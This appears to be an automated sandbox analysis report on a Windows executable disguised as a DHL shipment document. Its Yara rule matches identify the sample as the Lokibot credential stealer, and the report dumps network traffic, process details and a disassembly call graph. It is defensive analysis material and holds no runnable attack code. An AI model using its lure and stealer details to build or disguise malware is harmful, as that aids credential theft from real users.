                  Data Ascii: 3131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradie
                  Mar 21, 2023 07:13:29.829720020 CET284INData Raw: 75 73 74 69 66 69 65 64 2d 72 69 67 68 74 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 69 74 65 6d 73 2d 6a 75 73 74 69 66 69 65 64 2d 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7b 6a 75 73 74 69 66 79 2d 63 6f 6e
                  Data Ascii: ustified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolut
                  Mar 21, 2023 07:13:29.829747915 CET285INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d
                  Data Ascii: p--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff
                  Mar 21, 2023 07:13:29.829778910 CET287INData Raw: 67 72 61 79 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 33 38 2c 32 33 38 2c 32 33 38 29 20 30 25 2c 72 67 62 28 31 36 39 2c 31 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73
                  Data Ascii: gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,r
                  Mar 21, 2023 07:13:29.996907949 CET288INData Raw: 75 6f 74 6f 6e 65 2d 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 6d 61 67 65 6e 74 61 2d 79 65 6c 6c 6f 77 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 70
                  Data Ascii: uotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: clamp(0.875rem, 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:07:12:04
                  Start date:21/03/2023
                  Path:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Imagebase:0xe60000
                  File size:852480 bytes
                  MD5 hash:370EBDF4FF5036C106793994CC851779
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:low

                  General

                  Target ID:3
                  Start time:07:13:18
                  Start date:21/03/2023
                  Path:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  Imagebase:0x7ff61e220000
                  File size:852480 bytes
                  MD5 hash:370EBDF4FF5036C106793994CC851779
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:31.6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.4%
                    Total number of Nodes:1846
                    Total number of Limit Nodes:93
                    execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap HeapFree 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 14 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 13 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 12 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8520 40c4e3 8514->8520 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8520 8522 4040bb 12 API calls 8519->8522 8520->8515 8521 405f08 4 API calls 8523 40c005 8521->8523 8524 40c3f3 8522->8524 8525 40c021 8523->8525 8658 40a43f 8523->8658 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8533 40c4dd 8532->8533 8536 405695 2 API calls 8533->8536 8534 40c411 8720 405a87 8534->8720 8535 402bab 2 API calls 8535->8525 8536->8520 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8623->8625 8624 402bab GetProcessHeap HeapFree 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 12 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap HeapFree 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 12 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap HeapFree 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8521 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8535 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8534 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap HeapFree 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 9197->9198 9199 4031e5 4 API calls 9197->9199 9198->9131 9202 408a32 9199->9202 9200 408b17 9230 403649 9200->9230 9202->9200 9221 403666 9202->9221 9205 4031e5 4 API calls 9207 408a88 9205->9207 9208 4031e5 4 API calls 9207->9208 9213 408b0e 9207->9213 9209 408ac4 9208->9209 9210 405b6f 6 API calls 9209->9210 9211 408aff 9210->9211 9211->9213 9224 408508 9211->9224 9227 40362f 9213->9227 9215 408744 9214->9215 9216 4086e2 9214->9216 9215->9131 9216->9215 9217 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9216->9217 9217->9216 9219 4031e5 4 API calls 9218->9219 9220 4036b5 9219->9220 9220->9131 9222 4031e5 4 API calls 9221->9222 9223 403679 9222->9223 9223->9205 9223->9213 9225 4031e5 4 API calls 9224->9225 9226 40851b 9225->9226 9226->9213 9228 4031e5 4 API calls 